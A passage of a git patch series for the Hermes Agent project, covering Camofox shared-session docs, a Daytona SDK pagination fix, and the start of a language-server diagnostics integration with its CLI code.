- 'What changes when user_id is set' — soft-cleanup behavior, why
  DELETE /sessions/<user_id> is skipped.
- 'How tab adoption works' — 4-step lookup against GET /tabs, listItemId
  matching, fallback to new-tab creation, no mid-run re-polling.
- Picking session_key: how to attach to a specific existing tab vs
  share-profile-only behavior with the default per-task session_key.
- Concurrency note that Camofox does not arbitrate per-tab focus.
---
 website/docs/user-guide/features/browser.md | 32 ++++++++++++++++++---
 1 file changed, 28 insertions(+), 4 deletions(-)

diff --git a/website/docs/user-guide/features/browser.md b/website/docs/user-guide/features/browser.md
index d917363df8a..e27101a6472 100644
--- a/website/docs/user-guide/features/browser.md
+++ b/website/docs/user-guide/features/browser.md
@@ -237,7 +237,17 @@ Hermes derives the stable `userId` from the profile-scoped directory `~/.hermes/
 
 #### Externally managed Camofox sessions
 
-If another app owns the visible Camofox browser, configure Hermes to use that same Camofox identity:
+When another app drives the visible Camofox browser (a desktop assistant, a custom integration, another agent), configure Hermes to operate inside that same identity instead of spawning its own isolated profile.
+
+Three knobs control the behavior:
+
+| Setting | Env var | Effect |
+|---------|---------|--------|
+| `browser.camofox.user_id` | `CAMOFOX_USER_ID` | Camofox `userId` Hermes uses when creating tabs. Setting this opts the session into "externally managed" mode. |
+| `browser.camofox.session_key` | `CAMOFOX_SESSION_KEY` | `sessionKey` (a.k.a. `listItemId`) sent on tab creation. Used to match an existing tab during adoption. Defaults to a per-task value if unset. |
+| `browser.camofox.adopt_existing_tab` | `CAMOFOX_ADOPT_EXISTING_TAB` | When true, Hermes calls `GET /tabs?userId=<user_id>` on first use and reuses an existing tab before creating a new one. |
+
+Env vars take precedence over `config.yaml`. Either form works:
 
 ```yaml
 browser:
@@ -247,15 +257,29 @@ browser:
     adopt_existing_tab: true
 ```
 
-You can also set the equivalent environment variables:
-
 ```bash
 CAMOFOX_USER_ID=shared-camofox
 CAMOFOX_SESSION_KEY=visible-tab
 CAMOFOX_ADOPT_EXISTING_TAB=true
 ```
 
-When `user_id` is set, Hermes treats the Camofox session as externally managed and skips destructive cleanup. Set `adopt_existing_tab` when gateway restarts should recover the already-open tab before creating a new one.
+**What changes when `user_id` is set:**
+
+- Hermes skips destructive cleanup at task end (same as `managed_persistence: true`). The other app's tab/cookies/profile survive.
+- Hermes does **not** call `DELETE /sessions/<user_id>` — that endpoint wipes all user data, so it would nuke the external app's session if it fired.
+
+**How tab adoption works (when `adopt_existing_tab: true`):**
+
+1. On the first browser tool call after a process start, Hermes issues `GET /tabs?userId=<user_id>` (5-second timeout).
+2. If any tab in the response has `listItemId == session_key`, Hermes adopts the most recently created one in that group.
+3. Otherwise, Hermes adopts the most recently created tab for the user (any `listItemId`).
+4. If no tabs exist or the request fails, Hermes falls back to creating a new tab on the next operation.
+
+Adoption only fires until `tab_id` is populated for the session. If the external app closes the adopted tab mid-run, the next browser tool call will surface a Camofox error — Hermes does not re-poll for a fresh tab on every call.
+
+**Picking `session_key`:** if you want Hermes to reliably attach to a *specific* existing tab, set `session_key` to the `listItemId` the external app used when creating it. If you leave `session_key` unset and only set `user_id`, Hermes generates a per-task `session_key` (`task_<id>`) — Hermes will share cookies and the profile with the external app, but will open its own tab alongside instead of reusing one.
+
+**Concurrency note:** the external app and Hermes can drive the same Camofox `userId` simultaneously, but Camofox does not coordinate per-tab focus between clients. Coordinate ownership at the application layer (e.g. the external app pauses while Hermes runs).
 
 #### VNC live view
 

From d89553c2d6e97e5ec40421613b02d25eca730d9b Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:31:46 -0700
Subject: [PATCH 28/59] fix(daytona): migrate legacy-sandbox lookup to
 cursor-based list() (#24587)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Daytona ships breaking SDK changes on June 10, 2026 — `list()` returns
an iterator and the `page=` offset parameter is removed. We pin
daytona==0.155.0 so we're past the May 24 hard-cutoff, but the
legacy-sandbox resume path in DaytonaEnvironment still passes `page=1`
and reads `.items` off the result.

Switch to `next(iter(results), None)` against a single-result
`list(labels=..., limit=1)` call. Update tests to use `iter([...])`
and drop the `page=1` kwarg from list() assertions.
---
 tests/tools/test_daytona_environment.py |  8 ++++----
 tools/environments/daytona.py           | 10 +++++++---
 2 files changed, 11 insertions(+), 7 deletions(-)

diff --git a/tests/tools/test_daytona_environment.py b/tests/tools/test_daytona_environment.py
index 2c292ae6856..229a4e20e5c 100644
--- a/tests/tools/test_daytona_environment.py
+++ b/tests/tools/test_daytona_environment.py
@@ -91,7 +91,7 @@ def make_env(daytona_sdk, monkeypatch):
         if list_return is not None:
             mock_client.list.return_value = list_return
         else:
-            mock_client.list.return_value = SimpleNamespace(items=[])
+            mock_client.list.return_value = iter([])
 
         daytona_sdk.Daytona = MagicMock(return_value=mock_client)
 
@@ -156,13 +156,13 @@ class TestPersistence:
         legacy.process.exec.return_value = _make_exec_response(result="/root")
         env = make_env(
             get_side_effect=daytona_sdk.DaytonaError("not found"),
-            list_return=SimpleNamespace(items=[legacy]),
+            list_return=iter([legacy]),
             persistent=True,
             task_id="mytask",
         )
         legacy.start.assert_called_once()
         env._mock_client.list.assert_called_once_with(
-            labels={"hermes_task_id": "mytask"}, page=1, limit=1)
+            labels={"hermes_task_id": "mytask"}, limit=1)
         env._mock_client.create.assert_not_called()
 
     def test_persistent_creates_new_when_none_found(self, make_env, daytona_sdk):
@@ -176,7 +176,7 @@ class TestPersistence:
         # by checking get() was called with the right sandbox name
         env._mock_client.get.assert_called_with("hermes-mytask")
         env._mock_client.list.assert_called_with(
-            labels={"hermes_task_id": "mytask"}, page=1, limit=1)
+            labels={"hermes_task_id": "mytask"}, limit=1)
 
     def test_non_persistent_skips_lookup(self, make_env):
         env = make_env(persistent=False)
diff --git a/tools/environments/daytona.py b/tools/environments/daytona.py
index 1c677fc467d..803cef1d90b 100644
--- a/tools/environments/daytona.py
+++ b/tools/environments/daytona.py
@@ -101,9 +101,13 @@ class DaytonaEnvironment(BaseEnvironment):
 
             if self._sandbox is None:
                 try:
-                    page = self._daytona.list(labels=labels, page=1, limit=1)
-                    if page.items:
-                        self._sandbox = page.items[0]
+                    # Daytona SDK >=0.108.0 uses cursor-based pagination and
+                    # list() returns an iterator. Offset-based pagination
+                    # (page=1) is removed on June 10, 2026.
+                    results = self._daytona.list(labels=labels, limit=1)
+                    legacy = next(iter(results), None)
+                    if legacy is not None:
+                        self._sandbox = legacy
                         self._sandbox.start()
                         logger.info("Daytona: resumed legacy sandbox %s for task %s",
                                     self._sandbox.id, task_id)

From 83b93898c2673b29622b76e21e264f055ad7809d Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:31:54 -0700
Subject: [PATCH 29/59] feat(lsp): semantic diagnostics from real language
 servers in write_file/patch (#24168)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(lsp): semantic diagnostics from real language servers in write_file/patch

Wire ~26 language servers (pyright, gopls, rust-analyzer, typescript-language-server,
clangd, bash-language-server, ...) into the post-write lint check used by write_file
and patch. The model now sees type errors, undefined names, missing imports, and
project-wide semantic issues introduced by its edits, not just syntax errors.

LSP is gated on git workspace detection: when the agent's cwd or the file being
edited is inside a git worktree, LSP runs against that workspace; otherwise the
existing in-process syntax checks are the only tier. This keeps users on
user-home cwds (Telegram/Discord gateway chats) from spawning daemons.

The post-write check is layered: in-process syntax check first (microseconds),
then LSP semantic diagnostics second when syntax is clean. Diagnostics are
delta-filtered against a baseline captured at write start, so the agent only
sees errors its edit introduced. A flaky/missing language server can never
break a write -- every LSP failure path falls back silently to the syntax-only
result.

New module agent/lsp/ split into:

- protocol.py: Content-Length JSON-RPC framer + envelope helpers
- client.py: async LSPClient (spawn, initialize, didOpen/didChange,
  ContentModified retry, push/pull diagnostic stores)
- workspace.py: git worktree walk-up + per-server NearestRoot resolver
- servers.py: registry of 26 language servers (extension match,
  root resolver, spawn builder per language)
- install.py: auto-install dispatch (npm install --prefix, go install
  with GOBIN, pip install --target) into HERMES_HOME/lsp/bin/
- manager.py: LSPService (per-(server_id, root) client registry, lazy
  spawn, broken-set, in-flight dedupe, sync facade for tools layer)
- reporter.py: <diagnostics> block formatter (severity-1-only, 20-per-file)
- cli.py: hermes lsp {status,list,install,install-all,restart,which}

Wired into tools/file_operations.py:

- write_file/patch_replace now call _snapshot_lsp_baseline before write
- _check_lint_delta gains a third tier: LSP semantic diagnostics when
  syntax is clean
- All LSP code paths swallow exceptions; write_file's contract unchanged

Config: 'lsp' section in DEFAULT_CONFIG with enabled (default true),
wait_mode, wait_timeout, install_strategy (default 'auto'), and per-server
overrides (disabled, command, env, initialization_options).

Tests: tests/agent/lsp/ -- 49 tests covering protocol framing (encode and
read_message round-trip, EOF/truncation/missing Content-Length), workspace
gate (git walk-up, exclude markers, fallback to file location), reporter
(severity filter, max-per-file cap, truncation), service-level delta filter,
and an in-process mock LSP server that exercises the full client lifecycle
including didChange version bumps, dedup, crash recovery, and idempotent
teardown.

Live E2E verified end-to-end through ShellFileOperations: pyright
auto-installed via npm into HERMES_HOME, baseline captured, type error
introduced, single delta diagnostic surfaced with correct line/column/code/
source, then patch fix removes the diagnostic from the output.

Docs: new website/docs/user-guide/features/lsp.md page covering supported
languages, configuration knobs, performance characteristics, and
troubleshooting; cli-commands.md updated with the 'hermes lsp' reference;
sidebar updated.

* feat(lsp): structured logging, backend gate, defensive walk caps

Cherry-picks the substantive ideas from #24155 (different scope, same
problem space) onto our PR.

agent/lsp/eventlog.py (new): dedicated structured logger
``hermes.lint.lsp`` with steady-state silence. Module-level dedup sets
keep a 1000-write session at exactly ONE INFO line ("active for
<root>") at the default INFO threshold; clean writes log at DEBUG so
they never reach agent.log under normal config. State transitions
(server starts, no project root for a file, server unavailable) fire
at INFO/WARNING once per (server_id, key); novel events (timeouts,
unexpected errors) fire WARNING per call. Grep recipe: ``rg 'lsp\\['``.

agent/lsp/manager.py: wire the eventlog into _get_or_spawn and
get_diagnostics_sync so users can answer "did LSP fire on this edit?"
with a single grep, plus surface "binary not on PATH" warnings once
instead of silently retrying every write.

tools/file_operations.py: backend-type gate. ``_lsp_local_only()``
returns False for non-local backends (Docker / Modal / SSH /
Daytona); ``_snapshot_lsp_baseline`` and ``_maybe_lsp_diagnostics``
now skip entirely on remote envs. The host-side language server
can't see files inside a sandbox, so this prevents pretending to
lint a file the host process can't open.

agent/lsp/protocol.py: 8 KiB cap on the header block in
``read_message``. A pathological server that streams headers
without ever emitting CRLF-CRLF would have looped forever consuming
bytes; now raises ``LSPProtocolError`` instead.

agent/lsp/workspace.py: 64-step cap on ``find_git_worktree`` and
``nearest_root`` upward walks, plus try/except containment around
``Path(...).resolve()`` and child ``.exists()`` calls. Defensive
against pathological inputs (symlink loops, encoding errors,
permission failures mid-walk) — the lint hook is hot-path code and
must never raise.

Tests:
- tests/agent/lsp/test_eventlog.py: 18 tests covering steady-state
  silence (clean writes stay DEBUG), state-transition INFO-once
  semantics (active for, no project root), action-required
  WARNING-once (server unavailable), per-call WARNING (timeouts,
  spawn failures), and the "1000 clean writes => 1 INFO" contract.
- tests/agent/lsp/test_backend_gate.py: 5 tests verifying
  _lsp_local_only / snapshot_baseline / maybe_lsp_diagnostics skip
  the LSP layer for non-local backends and route correctly for
  LocalEnvironment.
- tests/agent/lsp/test_protocol.py: new test_read_message_rejects_runaway_header
  exercising the 8 KiB cap.

Validation:
- 73/73 LSP tests pass (49 original + 18 eventlog + 5 backend-gate + 1 framer cap)
- 198/198 pass when run alongside existing file_operations tests
- Live E2E re-run with pyright still surfaces "ERROR [2:12] Type
  ... reportReturnType (Pyright)" through the full path, then patch
  fix removes it on the next call.

* feat(lsp): atexit cleanup + separate lsp_diagnostics JSON field

Two improvements salvaged from #24414's plugin-form alternative,
keeping our core-integrated design:

1. atexit cleanup of spawned language servers
   ----------------------------------------------------------------
   ``agent/lsp/__init__.get_service`` now registers an ``atexit``
   handler on first creation that tears down the LSPService on
   Python exit.  Without this, every ``hermes chat`` exit was
   leaking pyright/gopls/etc. processes for a few seconds while
   their stdout buffers drained -- they got reaped by the kernel
   eventually but a watchful ``ps aux`` would catch them.

   The handler runs once per process (gated by
   ``_atexit_registered``); idempotent ``shutdown_service``
   ensures double-fire is a no-op.  Errors during shutdown are
   swallowed at debug level since by the time atexit fires the
   user has already seen the agent's final response.

2. Separate ``lsp_diagnostics`` field on WriteResult / PatchResult
   ----------------------------------------------------------------
   Previously the LSP layer folded its diagnostic block into the
   ``lint.output`` string, conflating the syntax-check tier with
   the semantic tier.  The agent (and any downstream parsers) now
   read syntax errors and semantic errors as independent signals:

       {
         "bytes_written": 42,
         "lint": {"status": "ok", "output": ""},
         "lsp_diagnostics": "<diagnostics file=...>\nERROR [2:12] ..."
       }

   ``_check_lint_delta`` returns to its original two-tier shape
   (syntax check + delta filter); ``write_file`` and
   ``patch_replace`` independently fetch LSP diagnostics via
   ``_maybe_lsp_diagnostics`` and pass them into the new field.
   ``patch_replace`` propagates the inner write_file's
   ``lsp_diagnostics`` so the outer PatchResult carries the patch's
   delta correctly.

Tests: 19 new
- tests/agent/lsp/test_lifecycle.py (8 tests): atexit registration
  fires once and only once across N get_service calls; the
  registered callable is our internal shutdown wrapper;
  shutdown_service is idempotent and safe when never started;
  exceptions during shutdown are swallowed; inactive service is
  cached so we don't rebuild on every check.
- tests/agent/lsp/test_diagnostics_field.py (11 tests): WriteResult
  / PatchResult dataclass shape, to_dict include/omit semantics,
  channel separation (lint and lsp_diagnostics carry independent
  signals), write_file populates the field via
  _maybe_lsp_diagnostics only when the syntax tier is clean,
  patch_replace propagates the field forward from its internal
  write_file.

Validation:
- 92/92 LSP tests pass (73 prior + 8 lifecycle + 11 diagnostics field)
- 217/217 pass with file_operations + LSP combined
- Live E2E reverified: clean writes -> both fields empty/none; type
  error introduced -> lint clean (parses), lsp_diagnostics carries
  the pyright reportReturnType block; patch fix -> both fields
  clean again.

* fix(lsp): broken-set short-circuit so a wedged server isn't paid every write

Discovered while auditing failure paths: a language server binary that
hangs (sleep forever, no LSP traffic on stdin/stdout) caused EVERY
subsequent write to re-pay the 8s snapshot_baseline timeout. Five
writes = ~64s of dead time.

The bug: ``_get_or_spawn`` adds the (server_id, root) pair to
``_broken`` inside its inner exception handler, but when the OUTER
``_loop.run`` timeout fires, it cancels the inner task before that
handler runs. The pair never makes it to broken-set, so the next
write re-enters the spawn path and re-pays the timeout.

Fix:

- New ``_mark_broken_for_file`` helper at the service layer marks
  the (server_id, workspace_root) pair broken from the OUTSIDE when
  the outer timeout fires. Called from the except branches in
  ``snapshot_baseline``, ``get_diagnostics_sync`` (asyncio.TimeoutError
  + generic Exception). Also kills any orphan client process that
  survived the cancelled future, fire-and-forget with a 1s ceiling.

- ``enabled_for`` now consults the broken-set BEFORE returning True.
  Files in already-broken (server_id, root) pairs short-circuit to
  False, so the file_operations layer skips the LSP path entirely
  with no spawn cost. Until the service is restarted (``hermes lsp
  restart``) or the process exits.

- A single eventlog WARNING is emitted on first mark-broken so the
  user knows which server gave up. Subsequent edits in the same
  project stay silent.

Tests: 7 new in tests/agent/lsp/test_broken_set.py — covers the
key shape (server_id, per_server_root), enabled_for short-circuit,
sibling-file skip in same project, project isolation (broken in
A doesn't affect B), graceful no-op for missing-server / no-workspace,
and an end-to-end test that snapshots after a failure and verifies
the next ``enabled_for`` returns False.

Validation:

- Live retest of the wedged-binary scenario: 5 sequential writes,
  first 8.88s (the one snapshot timeout), subsequent four ~0.84s
  (no LSP cost). Down from 5x12.85s = 64s before this fix.
- 99/99 LSP tests pass (92 prior + 7 broken-set)
- 224/224 pass with file_operations + LSP combined
- Happy path E2E reverified — clean write, type error introduced,
  patch fix all behave correctly with the new broken-set logic.

Note: the FIRST write to a wedged binary still pays 8s (the
snapshot_baseline timeout). We could shorten that, but pyright/
tsserver normally take 2-3s and slow CI rust-analyzer can need
5+ seconds, so 8s is the conservative ceiling. Subsequent writes
are instant.
---
 agent/lsp/__init__.py                     |  106 +++
 agent/lsp/cli.py                          |  270 ++++++
 agent/lsp/client.py                       |  930 +++++++++++++++++++
 agent/lsp/eventlog.py                     |  213 +++++
 agent/lsp/install.py                      |  347 +++++++
 agent/lsp/manager.py                      |  607 ++++++++++++
 agent/lsp/protocol.py                     |  196 ++++
 agent/lsp/reporter.py                     |   78 ++
 agent/lsp/servers.py                      | 1025 +++++++++++++++++++++
 agent/lsp/workspace.py                    |  223 +++++
 hermes_cli/config.py                      |   47 +
 hermes_cli/main.py                        |   11 +
 tests/agent/lsp/__init__.py               |    1 +
 tests/agent/lsp/_mock_lsp_server.py       |  159 ++++
 tests/agent/lsp/test_backend_gate.py      |  108 +++
 tests/agent/lsp/test_broken_set.py        |  213 +++++
 tests/agent/lsp/test_client_e2e.py        |  143 +++
 tests/agent/lsp/test_diagnostics_field.py |  146 +++
 tests/agent/lsp/test_eventlog.py          |  199 ++++
 tests/agent/lsp/test_lifecycle.py         |  144 +++
 tests/agent/lsp/test_protocol.py          |  197 ++++
 tests/agent/lsp/test_reporter.py          |   94 ++
 tests/agent/lsp/test_service.py           |  149 +++
 tests/agent/lsp/test_workspace.py         |  139 +++
 tools/file_operations.py                  |  159 +++-
 website/docs/reference/cli-commands.md    |   28 +
 website/docs/user-guide/features/lsp.md   |  228 +++++
 website/sidebars.ts                       |    1 +
 28 files changed, 6144 insertions(+), 17 deletions(-)
 create mode 100644 agent/lsp/__init__.py
 create mode 100644 agent/lsp/cli.py
 create mode 100644 agent/lsp/client.py
 create mode 100644 agent/lsp/eventlog.py
 create mode 100644 agent/lsp/install.py
 create mode 100644 agent/lsp/manager.py
 create mode 100644 agent/lsp/protocol.py
 create mode 100644 agent/lsp/reporter.py
 create mode 100644 agent/lsp/servers.py
 create mode 100644 agent/lsp/workspace.py
 create mode 100644 tests/agent/lsp/__init__.py
 create mode 100644 tests/agent/lsp/_mock_lsp_server.py
 create mode 100644 tests/agent/lsp/test_backend_gate.py
 create mode 100644 tests/agent/lsp/test_broken_set.py
 create mode 100644 tests/agent/lsp/test_client_e2e.py
 create mode 100644 tests/agent/lsp/test_diagnostics_field.py
 create mode 100644 tests/agent/lsp/test_eventlog.py
 create mode 100644 tests/agent/lsp/test_lifecycle.py
 create mode 100644 tests/agent/lsp/test_protocol.py
 create mode 100644 tests/agent/lsp/test_reporter.py
 create mode 100644 tests/agent/lsp/test_service.py
 create mode 100644 tests/agent/lsp/test_workspace.py
 create mode 100644 website/docs/user-guide/features/lsp.md

diff --git a/agent/lsp/__init__.py b/agent/lsp/__init__.py
new file mode 100644
index 00000000000..7819162dd45
--- /dev/null
+++ b/agent/lsp/__init__.py
@@ -0,0 +1,106 @@
+"""Language Server Protocol (LSP) integration for Hermes Agent.
+
+Hermes runs full language servers (pyright, gopls, rust-analyzer,
+typescript-language-server, etc.) as subprocesses and pipes their
+``textDocument/publishDiagnostics`` output into the post-write lint
+delta filter used by ``write_file`` and ``patch``.
+
+LSP is **gated on git workspace detection** — if the agent's cwd is
+inside a git repository, LSP runs against that workspace; otherwise the
+file_operations layer falls back to its existing in-process syntax
+checks.  This keeps users on user-home cwd's (e.g. Telegram gateway
+chats) from spawning daemons they don't need.
+
+Public API:
+
+    from agent.lsp import get_service
+
+    svc = get_service()
+    if svc and svc.enabled_for(path):
+        await svc.touch_file(path)
+        diags = svc.diagnostics_for(path)
+
+The bulk of the wiring is internal — most callers only need the layer
+in :func:`tools.file_operations.FileOperations._check_lint_delta`,
+which is already wired (see that module).
+
+Architecture is documented in ``website/docs/user-guide/features/lsp.md``.
+"""
+from __future__ import annotations
+
+import atexit
+import logging
+import threading
+from typing import Optional
+
+from agent.lsp.manager import LSPService
+
+logger = logging.getLogger("agent.lsp")
+
+_service: Optional[LSPService] = None
+_atexit_registered = False
+_service_lock = threading.Lock()
+
+
+def get_service() -> Optional[LSPService]:
+    """Return the process-wide LSP service singleton, or None when disabled.
+
+    The service is created lazily on first call.  ``None`` is returned
+    when LSP is disabled in config, when no workspace can be detected,
+    or when the platform doesn't support subprocess-based LSP servers.
+
+    On first creation, registers an :mod:`atexit` handler that tears
+    down spawned language servers on Python exit so a long-running
+    CLI or gateway session doesn't leak pyright/gopls/etc. processes
+    when it terminates.
+    """
+    global _service, _atexit_registered
+    if _service is not None:
+        return _service if _service.is_active() else None
+    with _service_lock:
+        if _service is not None:
+            return _service if _service.is_active() else None
+        _service = LSPService.create_from_config()
+        if not _atexit_registered:
+            # ``atexit`` handlers run in LIFO order on normal Python
+            # exit and on SystemExit, but NOT on os._exit() or
+            # uncaught signals.  Language servers are stateless
+            # subprocesses — losing them on SIGKILL is fine; they'll
+            # be reaped by the kernel along with their parent.  We
+            # care about clean exits where Python flushes stdio
+            # before terminating; without this hook every
+            # ``hermes chat`` exit would leak pyright processes that
+            # outlive the parent for a few seconds while their
+            # stdout buffers drain.
+            atexit.register(_atexit_shutdown)
+            _atexit_registered = True
+    return _service if (_service is not None and _service.is_active()) else None
+
+
+def shutdown_service() -> None:
+    """Tear down the LSP service if one was started.
+
+    Safe to call multiple times; safe to call when no service was created.
+    """
+    global _service
+    with _service_lock:
+        svc = _service
+        _service = None
+    if svc is not None:
+        try:
+            svc.shutdown()
+        except Exception as e:  # noqa: BLE001
+            logger.debug("LSP shutdown error: %s", e)
+
+
+def _atexit_shutdown() -> None:
+    """atexit-registered wrapper.  Logs at debug because by the time
+    atexit fires the user has already seen the agent's final output —
+    a noisy shutdown line on top of that is just clutter."""
+    try:
+        shutdown_service()
+    except Exception as e:  # noqa: BLE001
+        logger.debug("atexit LSP shutdown failed: %s", e)
+
+
+__all__ = ["get_service", "shutdown_service", "LSPService"]
diff --git a/agent/lsp/cli.py b/agent/lsp/cli.py
new file mode 100644
index 00000000000..97a52c7c76c
--- /dev/null
+++ b/agent/lsp/cli.py
@@ -0,0 +1,270 @@
+"""``hermes lsp`` CLI subcommand.
+
+Subcommands:
+
+- ``status`` — show service state, configured servers, install status.
+- ``install <server_id>`` — eagerly install one server's binary.
+- ``install-all`` — try to install every server with a known recipe.
+- ``restart`` — tear down running clients so the next edit re-spawns.
+- ``which <server_id>`` — print the resolved binary path for one server.
+- ``list`` — print the registry of supported servers.
+
+The handlers are kept here (rather than in
+``hermes_cli/main.py``) so the LSP module ships self-contained.
+"""
+from __future__ import annotations
+
+import argparse
+import sys
+from typing import Optional
+
+
+def register_subparser(subparsers: argparse._SubParsersAction) -> None:
+    """Wire the ``hermes lsp`` subcommand tree into the main argparse."""
+    parser = subparsers.add_parser(
+        "lsp",
+        help="Language Server Protocol management",
+        description=(
+            "Manage the LSP layer that powers post-write semantic "
+            "diagnostics in write_file/patch."
+        ),
+    )
+    sub = parser.add_subparsers(dest="lsp_command")
+
+    sub_status = sub.add_parser("status", help="Show LSP service status")
+    sub_status.add_argument(
+        "--json", action="store_true", help="Emit machine-readable JSON"
+    )
+
+    sub_list = sub.add_parser("list", help="List supported language servers")
+    sub_list.add_argument(
+        "--installed-only",
+        action="store_true",
+        help="Only show servers whose binary is currently available",
+    )
+
+    sub_install = sub.add_parser("install", help="Install a server binary")
+    sub_install.add_argument("server", help="Server id (e.g. pyright, gopls)")
+
+    sub_install_all = sub.add_parser(
+        "install-all",
+        help="Install every server with a known auto-install recipe",
+    )
+    sub_install_all.add_argument(
+        "--include-manual",
+        action="store_true",
+        help="Even attempt servers marked manual-install (best effort)",
+    )
+
+    sub_restart = sub.add_parser(
+        "restart",
+        help="Tear down running LSP clients (next edit re-spawns)",
+    )
+
+    sub_which = sub.add_parser("which", help="Print binary path for a server")
+    sub_which.add_argument("server", help="Server id")
+
+    parser.set_defaults(func=run_lsp_command)
+
+
+def run_lsp_command(args: argparse.Namespace) -> int:
+    """Top-level dispatcher for ``hermes lsp <subcommand>``."""
+    sub = getattr(args, "lsp_command", None) or "status"
+    try:
+        if sub == "status":
+            return _cmd_status(getattr(args, "json", False))
+        if sub == "list":
+            return _cmd_list(getattr(args, "installed_only", False))
+        if sub == "install":
+            return _cmd_install(args.server)
+        if sub == "install-all":
+            return _cmd_install_all(getattr(args, "include_manual", False))
+        if sub == "restart":
+            return _cmd_restart()
+        if sub == "which":
+            return _cmd_which(args.server)
+        sys.stderr.write(f"unknown lsp subcommand: {sub}\n")
+        return 2
+    except KeyboardInterrupt:
+        return 130
+
+
+def _cmd_status(emit_json: bool) -> int:
+    from agent.lsp import get_service
+    from agent.lsp.servers import SERVERS
+    from agent.lsp.install import detect_status
+
+    svc = get_service()
+    service_active = svc is not None
+    info = svc.get_status() if svc is not None else {"enabled": False}
+
+    if emit_json:
+        import json
+        payload = {
+            "service": info,
+            "registry": [
+                {
+                    "server_id": s.server_id,
+                    "extensions": list(s.extensions),
+                    "description": s.description,
+                    "binary_status": detect_status(_recipe_pkg_for(s.server_id)),
+                }
+                for s in SERVERS
+            ],
+        }
+        sys.stdout.write(json.dumps(payload, indent=2) + "\n")
+        return 0
+
+    out = []
+    out.append("LSP Service")
+    out.append("===========")
+    out.append(f"  enabled:         {info.get('enabled', False)}")
+    if service_active:
+        out.append(f"  wait_mode:       {info.get('wait_mode')}")
+        out.append(f"  wait_timeout:    {info.get('wait_timeout')}s")
+        out.append(f"  install_strategy:{info.get('install_strategy')}")
+        clients = info.get("clients") or []
+        if clients:
+            out.append(f"  active clients:  {len(clients)}")
+            for c in clients:
+                out.append(
+                    f"    - {c['server_id']:20s} state={c['state']:10s} root={c['workspace_root']}"
+                )
+        else:
+            out.append("  active clients:  none")
+        broken = info.get("broken") or []
+        if broken:
+            out.append(f"  broken pairs:    {len(broken)}")
+            for b in broken:
+                out.append(f"    - {b}")
+        disabled = info.get("disabled_servers") or []
+        if disabled:
+            out.append(f"  disabled in cfg: {', '.join(disabled)}")
+    out.append("")
+    out.append("Registered Servers")
+    out.append("==================")
+    for s in SERVERS:
+        pkg = _recipe_pkg_for(s.server_id)
+        status = detect_status(pkg)
+        marker = {
+            "installed": "✓",
+            "missing": "·",
+            "manual-only": "?",
+        }.get(status, " ")
+        ext_summary = ", ".join(list(s.extensions)[:5])
+        if len(s.extensions) > 5:
+            ext_summary += f", … (+{len(s.extensions) - 5})"
+        out.append(
+            f"  {marker} {s.server_id:24s} [{status:11s}] {ext_summary}"
+        )
+        if s.description:
+            out.append(f"      {s.description}")
+    sys.stdout.write("\n".join(out) + "\n")
+    return 0
+
+
+def _cmd_list(installed_only: bool) -> int:
+    from agent.lsp.servers import SERVERS
+    from agent.lsp.install import detect_status
+
+    for s in SERVERS:
+        pkg = _recipe_pkg_for(s.server_id)
+        status = detect_status(pkg)
+        if installed_only and status != "installed":
+            continue
+        sys.stdout.write(
+            f"{s.server_id:24s} [{status:11s}] {','.join(s.extensions)}\n"
+        )
+    return 0
+
+
+def _cmd_install(server_id: str) -> int:
+    from agent.lsp.install import try_install, INSTALL_RECIPES, detect_status
+    pkg = _recipe_pkg_for(server_id)
+    pre_status = detect_status(pkg)
+    if pre_status == "installed":
+        sys.stdout.write(f"{server_id} already installed\n")
+        return 0
+    sys.stdout.write(f"installing {server_id} (pkg={pkg}) ...\n")
+    sys.stdout.flush()
+    bin_path = try_install(pkg, "auto")
+    if bin_path is None:
+        recipe = INSTALL_RECIPES.get(pkg)
+        if recipe and recipe.get("strategy") == "manual":
+            sys.stderr.write(
+                f"{server_id}: this server requires a manual install. "
+                f"See documentation.\n"
+            )
+        else:
+            sys.stderr.write(f"{server_id}: install failed (see logs).\n")
+        return 1
+    sys.stdout.write(f"installed: {bin_path}\n")
+    return 0
+
+
+def _cmd_install_all(include_manual: bool) -> int:
+    from agent.lsp.servers import SERVERS
+    from agent.lsp.install import try_install, INSTALL_RECIPES, detect_status
+
+    rc = 0
+    for s in SERVERS:
+        pkg = _recipe_pkg_for(s.server_id)
+        recipe = INSTALL_RECIPES.get(pkg)
+        if recipe is None:
+            continue
+        if recipe.get("strategy") == "manual" and not include_manual:
+            continue
+        if detect_status(pkg) == "installed":
+            sys.stdout.write(f"  {s.server_id:24s} already installed\n")
+            continue
+        sys.stdout.write(f"  installing {s.server_id} (pkg={pkg}) ... ")
+        sys.stdout.flush()
+        path = try_install(pkg, "auto")
+        if path:
+            sys.stdout.write(f"ok ({path})\n")
+        else:
+            sys.stdout.write("FAILED\n")
+            rc = 1
+    return rc
+
+
+def _cmd_restart() -> int:
+    from agent.lsp import shutdown_service
+
+    shutdown_service()
+    sys.stdout.write("LSP service shut down. Next edit will respawn clients.\n")
+    return 0
+
+
+def _cmd_which(server_id: str) -> int:
+    from agent.lsp.install import INSTALL_RECIPES, hermes_lsp_bin_dir
+    import os
+    import shutil as _shutil
+
+    recipe = INSTALL_RECIPES.get(server_id)
+    bin_name = (recipe or {}).get("bin", server_id)
+    staged = hermes_lsp_bin_dir() / bin_name
+    if staged.exists():
+        sys.stdout.write(str(staged) + "\n")
+        return 0
+    on_path = _shutil.which(bin_name)
+    if on_path:
+        sys.stdout.write(on_path + "\n")
+        return 0
+    sys.stderr.write(f"{server_id}: not installed\n")
+    return 1
+
+
+def _recipe_pkg_for(server_id: str) -> str:
+    """Map a registry ``server_id`` to its install-recipe package key."""
+    # The mapping lives here (not in install.py) because it's a CLI
+    # convenience layer.  Most server_ids are also their own recipe
+    # key, but a few differ (e.g. ``vue-language-server`` →
+    # ``@vue/language-server``).
+    aliases = {
+        "vue-language-server": "@vue/language-server",
+        "astro-language-server": "@astrojs/language-server",
+        "dockerfile-ls": "dockerfile-language-server-nodejs",
+        "typescript": "typescript-language-server",
+    }
+    return aliases.get(server_id, server_id)
diff --git a/agent/lsp/client.py b/agent/lsp/client.py
new file mode 100644
index 00000000000..8f380fc7a60
